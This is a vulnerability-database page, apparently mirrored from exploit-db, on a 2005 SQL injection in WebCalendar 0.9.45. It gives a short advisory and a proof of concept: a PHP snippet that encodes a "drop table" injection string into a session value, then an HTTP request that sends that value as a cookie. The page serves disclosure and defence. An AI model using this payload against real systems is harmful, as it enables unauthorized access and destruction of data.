WebCalendar 0.9.45 – SQL Injection

26次阅读
没有评论

WebCalendar 0.9.45 – SQL Injection

漏洞ID 1054908 漏洞类型
发布时间 2005-02-17 更新时间 2005-02-17
WebCalendar 0.9.45 - SQL InjectionCVE编号 N/A
WebCalendar 0.9.45 - SQL InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25113
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12581/info

WebCalendar is affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

This vulnerability is reported to affect WebCalendar 0.9.45; earlier versions may also be affected.

The vendor has addressed this issue in WebCalendar 1.0RC1 and later. 

<?php
include_once 'includes/init.php';
echo encode_string("'; drop table foo; select 'a|zzabcdefg");
?>

output:
7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8

attack payload:
telnet example.com
GET /login.php HTTP/1.1
Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8

相关推荐: Pserv Request Method Buffer Overflow Vulnerability

Pserv Request Method Buffer Overflow Vulnerability 漏洞ID 1101183 漏洞类型 Boundary Condition Error 发布时间 2002-11-30 更新时间 2002-11-30 CVE编…

正文完
 0